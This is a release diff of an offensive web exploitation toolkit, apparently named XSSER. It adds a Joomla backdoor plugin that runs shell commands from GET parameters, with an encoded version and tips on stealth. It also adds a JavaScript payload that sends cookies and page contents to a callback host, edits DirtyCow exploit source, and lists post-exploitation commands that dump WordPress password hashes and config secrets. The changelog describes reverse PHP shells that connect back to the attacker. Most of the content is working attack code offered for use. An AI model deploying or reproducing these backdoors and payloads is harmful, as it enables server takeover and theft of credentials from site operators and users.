Public Release of Version 2.7.5 + Extras

Audio/AUDIO_LICENSE

@@ -1,3 +1,5 @@
-The audio files (.wav and .mp3) located within the Audio directory are considered fair use and may not be used commercially, as they are remixed work. (The original files have been modified to say "Shell" instead of "Mail".)
+The audio files (.wav and .mp3) located within the Audio directory, are considered fair use and may not be used
+commercially, as they are remixed work. (The original files have been modified to say "Shell" instead of "Mail".)
 
-The creator of this tool only holds copyright over the word "Shell" used in the aforementioned audio files, which are applicable to the terms specified in the LICENSE file. (i.e. Less strict and may be remixed.)
+The creator of this tool only holds copyright over the word "Shell", used in the aforementioned audio files, which
+are applicable to the terms specified in the LICENSE file. (i.e. Less strict and may be remixed.)

CHANGELOG

@@ -1,18 +1,86 @@
-CHANGELOG
-
-Version 2.5:
-- WordPress Theme and Plugin injection are not using a hardcoded hostname anymore. (TARGETWEBSITE is now properly replaced)
-- Removed deprecated code for WordPress Theme and Plugin injection, so that the user is not asked twice to provide hostname to exploit.
-- Added dirtycow 32-bit and 64-bit source code files to the web servers. https://www.exploit-db.com/exploits/40616/ Note: This seems to cause kernel panic after the user quits the shell.
-- Removed --title from gnome-terminal commands as this option is no longer supported.
-- Notifications:
-  -- Added notification to the console / web server log.
-  -- Added a popup terminal notification with some ANSI text when the JavaScript is executed and "JS Shell Notify" is triggered.
-  -- Added a voice notification when the Reverse PHP Shell (Notify) option is executed on the remote server. Shell attempts to wget back to this host to the PHP Shell Notify web handler.
-- Automation:
-  -- vBulletin and WordPress shells are now automatically activated when the JavaScript is triggered.
-- New attack vectors:
-  -- Joomla "SecurityCheck" Addon - https://www.exploit-db.com/exploits/39879/ - EDB ID: 39879
-
-  Version 2.0:
-  - First public version for Black Hat Europe
+CHANGELOG
+
+/--------------\
+| Version 2.75 |
+\--------------/
+General:
+- Various improvements and optimizations.
+- Various files may have comments such as: // noinspection JSUndefinedPropertyAssignment
+  This type of comment is intended for PyCharm to ignore certain warnings and errors.
+- Various todo notes have been added to the files for future versions. These also function
+  as a roadmap, to see what's planned in upcoming releases.
+- Added another command to run during post-exploitation scenarios for WordPress.
+- Added some other commands and resources for post-exploitation in general.
+- Formatted license slightly so that it has appropriate linebreaks.
+- Added "requirements.txt" and "requirements-all-libraries-used.txt" files for easier
+  dependency installation with python pip.
+
+Joomla backdoor:
+- Now checks if the "c" or "c64" parameters are set before executing any code.
+- Base64 encoded payloads are now, also supported via the "c64" HTTP parameter.
+- All error reporting has been disabled for this backdoor.
+- For added stealth, this backdoor/plugin can e.g. be encoded. (Refer to PHP files.)
+- Additional comments about advanced usage can also be found in the PHP files.
+- For changing how the plugin itself works and is referenced within Joomla,
+  please refer to the helloshell.xml file. Note: Almost everything can easily be changed
+  in these files, except the directory name which must also be renamed in xsser.py.
+
+JavaScript payloads:
+- Added a new educational and generic payload. This has not been implemented into xsser.py yet.
+- Versions standardized across all payloads.
+- SetCookie() now uses non-deprecated functions.
+- The "cookie match" now uses regular expressions to properly check if the attacker's cookie is present.
+- Joomla payloads now have a "self-removal" option for the initial injection.
+  Note: This only seems to work when executed manually at the moment.
+- WordPress payloads have been updated to use "nonce" instead of "_wpnonce", as this was changed since
+  last year. A future version may be used to generate the correct payload, depending on whether a very
+  old version of WordPress is in use, or a currently up to date version.
+- The prepopulated forms in the WordPress payloads have been updated, to accommodate source code changes
+  since last year.
+- setTimeout() was updated so it is used in a better, and more maintainable manner.
+- Header sections are now more standardized, in terms of design and layout.
+
+XSSER:
+- Switched from gnome-terminal to xterm due to several configuration options being deprecated.
+- Removed the redundant requirements description. Please refer to the README.md file instead.
+- Removed "written for", "tested on", "tested against", and "changelog". Refer to README.md
+- Added new function which gets all assigned IP addresses and lets the user choose which to listen on.
+  This minimizes the time that the user has to spend on typing the IP address to listen on and serve files from.
+  -- vBSEO and BetterWPSecurity Exploits: PHP and JS filenames are now generated in a more random manner.
+- All JavaScript payloads are now minified (comments and extra newlines removed) and base64 encoded during run-time.
+- Converted all "os.system(curl)" requests to python requests with 3 second timeout instead.
+- Converted all "httplib.HTTPConnection()" requests to python 'requests' with 3 second timeout.
+- Replaced all "%s" with "{}".format()
+- Joomla "Hello_Shell" backdoor (zip) file, is now automatically generated each time the xsser.py tool runs.
+  Note: If you make a change to any of the files in the Hello_Shell directory, simply exit xsser.py and run
+  it again to automatically create the zip file.
+- Experimental POST-request handler implemented into the generic web server. This is currently not used.
+
+Testing:
+- All exploits and payloads have been tested against the latest application versions, except vBulletin 4.X.X
+  which is not compatible with the now deprecated vBSEO plugin.
+
+/-------------\
+| Version 2.5 |
+\-------------/
+- WordPress Theme and Plugin injection are not using a hardcoded hostname anymore. (TARGETWEBSITE is now
+  properly replaced)
+- Removed deprecated code for WordPress Theme and Plugin injection, so that the user is not asked twice to
+  provide hostname.
+- Added dirtycow 32-bit and 64-bit source code files to the web servers. https://www.exploit-db.com/exploits/40616/
+  Note: This seems to cause kernel panic after the user quits the shell.
+- Removed --title from gnome-terminal commands as this option is no longer supported.
+- Notifications:
+  -- Added notifications to the console / web server log.
+  -- Added a popup notification with some ASCII text, when the JavaScript has been fully executed by the target.
+  -- Added a voice notification, when the Reverse PHP Shell (Notify) option is used, and the associated code
+     in the PHP shell connects back to the attacker's machine.
+- Automation:
+  -- vBulletin and WordPress shells are now automatically activated when the JavaScript is triggered.
+- New attack vectors:
+  -- Joomla "SecurityCheck" Addon - https://www.exploit-db.com/exploits/39879/ - EDB ID: 39879
+
+/-------------\
+| Version 2.0 |
+\-------------/
+- First public version for Black Hat Europe

Cool Commands

@@ -5,4 +5,16 @@ cat config.php | grep -P '(MasterServer|dbname)'
 
 WordPress:
 cat wp-config.php | grep -P '(KEY|SALT)'
-cat wp-config.php | grep DB_
+cat wp-config.php | grep DB_
+
+# Username: root, Password: root, Database name: wordpress
+mysql -uroot -proot wordpress -e 'select user_login,user_pass from wp_users;' > /tmp/wordpress_hashes
+# Download the file and then run it against hashcat (-m 400) for example.
+# See e.g. https://samsclass.info/seminars/CMS/hashcat-wordpress.htm
+
+Less cool commands:
+1) Find world-writeable files: find /dir -xdev -perm +o=w ! \( -type d -perm +o=t \) ! -type l -print
+2) Find world-readable files:  find /dir -xdev -perm +o=r ! \( -type d -perm +o=t \) ! -type l -print
+
+Privilege escalation:
+https://github.com/mzet-/linux-exploit-suggester

Exploits/dirtycow32.c

@@ -30,7 +30,7 @@ struct stat st;
 char *name;
 pthread_t pth1,pth2,pth3;
 
-// change if no permissions to read
+// Change if no permissions to read
 char suid_binary[] = "/usr/bin/passwd";
 
 /*
@@ -51,7 +51,6 @@ unsigned char sc[] = {
   0x89, 0xe1, 0xcd, 0x80
 };
 unsigned int sc_len = 136;
-/**/
 
 void *madviseThread(void *arg)
 {

Hello_Shell/admin/helloshell.php

@@ -0,0 +1,28 @@
+<?php
+
+// For ethical and legal purposes only. This script is provided as is and without warranty.
+//
+// Version: 2.75
+
+if (isset($_GET['c']) && !empty($_GET['c'])) {
+  echo "<pre>";
+  echo @system($_GET['c']); // Don't output errors.
+  echo "</pre>";
+}
+
+if (isset($_GET['c64']) && !empty($_GET['c64'])) {
+  echo "<pre>";
+  echo @system(base64_decode($_GET['c64'])); // Allow Base64 input
+  echo "</pre>";
+}
+
+// If you want to be more stealthy, then you can use only the line below.
+// Samples seen in the wild typically use a mix of base64, gzip, odd variables and multiple rounds of encoding.
+// eval(base64_decode("aWYgKGlzc2V0KCRfR0VUWydjJ10pICYmICFlbXB0eSgkX0dFVFsnYyddKSkgew0KICBlY2hvICI8cHJlPiI7DQogIGVjaG8gQHN5c3RlbSgkX0dFVFsnYyddKTsgLy8gRG9uJ3Qgb3V0cHV0IGVycm9ycy4NCiAgZWNobyAiPC9wcmU+IjsNCn0NCg0KaWYgKGlzc2V0KCRfR0VUWydjNjQnXSkgJiYgIWVtcHR5KCRfR0VUWydjNjQnXSkpIHsNCiAgZWNobyAiPHByZT4iOw0KICBlY2hvIEBzeXN0ZW0oYmFzZTY0X2RlY29kZSgkX0dFVFsnYzY0J10pKTsgLy8gQWxsb3cgQmFzZTY0IGlucHV0DQogIGVjaG8gIjwvcHJlPiI7DQp9"));
+
+// If you use this during a penetration test, you may want to consider adding some sort of authentication.
+// This can be achieved by adding another check, such as: if ($_GET['auth']=="md5-hash-here") { @system() code here }
+// Obviously, GET-requests have a length limit, and are also logged by default with pretty much any web server.
+// To circumvent this, you could use POST-requests, which some web servers log. You can also use cookies, or a
+// custom HTTP header. Future versions of this tool may include functionality to automatically modify this backdoor.
+?>

Joomla_Backdoor/Hello_Shell/helloshell.xml → Hello_Shell/helloshell.xml

@@ -1,17 +1,18 @@
 <?xml version="1.0" encoding="utf-8"?>
 <!-- Based on the following https://docs.joomla.org/J3.x:Developing_an_MVC_Component/Developing_a_Basic_Component -->
+<!--suppress XmlUnboundNsPrefix -->
 <extension type="component" version="3.2.0" method="upgrade">
-
+	<!-- You can rename any of the variables to make this backdoor less obvious -->
 	<name>Hello Shell!</name>
 	<!-- The following elements are optional and free of formatting constraints -->
-	<creationDate>November 2016</creationDate>
-	<author>John Doe</author>
-	<authorEmail>john.doe@example.org</authorEmail>
-	<authorUrl>http://www.example.org</authorUrl>
+	<creationDate>March 2018</creationDate>
+	<author>Varbaek</author>
+	<authorEmail>xsser@varbits.net</authorEmail>
+	<authorUrl>https://www.varbits.com</authorUrl>
 	<copyright>Copyright Info</copyright>
 	<license>License Info</license>
 	<!--  The version string is recorded in the components table -->
-	<version>0.0.1</version>
+	<version>2.7.5</version>
 	<!-- The description is optional and defaults to the name -->
 	<description>Description of the Hello Shell component ...</description>
 

Hello_Shell/site/helloshell.php

@@ -0,0 +1,28 @@
+<?php
+
+// For ethical and legal purposes only. This script is provided as is and without warranty.
+//
+// Version: 2.75
+
+if (isset($_GET['c']) && !empty($_GET['c'])) {
+  echo "<pre>";
+  echo @system($_GET['c']); // Don't output errors.
+  echo "</pre>";
+}
+
+if (isset($_GET['c64']) && !empty($_GET['c64'])) {
+  echo "<pre>";
+  echo @system(base64_decode($_GET['c64'])); // Allow Base64 input
+  echo "</pre>";
+}
+
+// If you want to be more stealthy, then you can use only the line below.
+// Samples seen in the wild typically use a mix of base64, gzip, odd variables and multiple rounds of encoding.
+// eval(base64_decode("aWYgKGlzc2V0KCRfR0VUWydjJ10pICYmICFlbXB0eSgkX0dFVFsnYyddKSkgew0KICBlY2hvICI8cHJlPiI7DQogIGVjaG8gQHN5c3RlbSgkX0dFVFsnYyddKTsgLy8gRG9uJ3Qgb3V0cHV0IGVycm9ycy4NCiAgZWNobyAiPC9wcmU+IjsNCn0NCg0KaWYgKGlzc2V0KCRfR0VUWydjNjQnXSkgJiYgIWVtcHR5KCRfR0VUWydjNjQnXSkpIHsNCiAgZWNobyAiPHByZT4iOw0KICBlY2hvIEBzeXN0ZW0oYmFzZTY0X2RlY29kZSgkX0dFVFsnYzY0J10pKTsgLy8gQWxsb3cgQmFzZTY0IGlucHV0DQogIGVjaG8gIjwvcHJlPiI7DQp9"));
+
+// If you use this during a penetration test, you may want to consider adding some sort of authentication.
+// This can be achieved by adding another check, such as: if ($_GET['auth']=="md5-hash-here") { @system() code here }
+// Obviously, GET-requests have a length limit, and are also logged by default with pretty much any web server.
+// To circumvent this, you could use POST-requests, which some web servers log. You can also use cookies, or a
+// custom HTTP header. Future versions of this tool may include functionality to automatically modify this backdoor.
+?>

LICENSE

@@ -10,23 +10,27 @@ to make commercial use of the work
 
 Under the following conditions:
 Attribution -- You must give the original author credit.
-Share Alike -- If you alter, transform, or build upon this work, you may distribute the resulting work only under a licence identical to this one.
+Share Alike -- If you alter, transform, or build upon this work, you may distribute the resulting
+               work only under a licence identical to this one.
 
 
 With the understanding that:
 Waiver -- Any of the above conditions can be waived if you get permission from the copyright holder.
 
-Public Domain -- Where the work or any of its elements is in the public domain under applicable law, that status is in no way affected by the licence.
+Public Domain -- Where the work or any of its elements is in the public domain under applicable law,
+                 that status is in no way affected by the licence.
 
 Other Rights -- In no way are any of the following rights affected by the licence:
 
 Your fair dealing or fair use rights, or other applicable copyright exceptions and limitations;
 
 The author's moral rights;
 
-Rights other persons may have either in the work itself or in how the work is used, such as publicity or privacy rights.
+Rights other persons may have either in the work itself or in how the work is used, such as publicity
+or privacy rights.
 
 Notice -- For any reuse or distribution, you must make clear to others the licence terms of this work.
 
 
-This license does not apply to meterpreter.php (refer to Metasploit's license) and php-reverse-shell.php (refer to the attached GPLv2).
+This license does not apply to meterpreter.php (refer to Metasploit's license) and php-reverse-shell.php
+(refer to GPLv2: https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html).

Payloads/javascript/generic_payload.js

@@ -0,0 +1,58 @@
+/*
+Title: Generic JS Payload
+Author: Hans-Michael Varbaek
+Company: VarBITS
+
+Version: 2.75 - Extras
+
+Changelog:
+- Ver 2.75 : First version published with the "extras" release.
+
+Inspired by: XSSHunter
+
+Description:
+This payload obtains information about the page where it was executed.
+While it does not attempt to hook the browser, or make the administrator
+perform an arbitrary action, it is useful during web app penetration tests
+where hidden functionality is not tested, such as a control panel which
+may be vulnerable to stored cross-site scripting.
+(i.e. a user's profile is viewed from an admin control panel.)
+
+This particular payload is mostly meant for educational purposes.
+
+TODO:
+- Implement this as an option within the xsser.py tool
+- Implement error handling in a future version if necessary:
+    try {
+        x = x();
+    } catch ( e ) {
+        x = '';
+    }
+
+For ethical and legal purposes only. This script is provided as is and without warranty.
+*/
+
+// DEFINE VARIABLES
+var domain = document.domain; // "pypi.python.org"
+// You can also use the following: location.origin which includes the scheme, i.e. http/https
+var location = document.location(); // "https://pypi.python.org/pypi/jsmin"
+// You could also use the following: location.toString()
+var cookies = document.cookie; // "__utma=1234567890...;__utmb=0987654321"
+var referrer = document.referrer; // "google.com"
+var useragent = navigator.userAgent; // "Mozilla/5.0 ..."
+var unixtime = new Date().getTime().toString(); // 1515353242209
+var fullpage = document.documentElement.outerHTML; // Complete HTML page, useful for analysis.
+
+// CREATE FORM AND SEND REQUEST
+var formData = new FormData();
+formData.append("domain_name", domain);
+formData.append("complete_url", location);
+formData.append("non_http_only_cookies", cookies);
+formData.append("http_referer", referrer);
+formData.append("user_agent", useragent);
+formData.append("unix_time", unixtime);
+formData.append("full_html_page", fullpage);
+
+var request = new XMLHttpRequest();
+request.open("POST", "http://CALLBACKHOST:CALLBACKPORT/"); // This will be populated by the xsser.py tool.
+request.send(formData);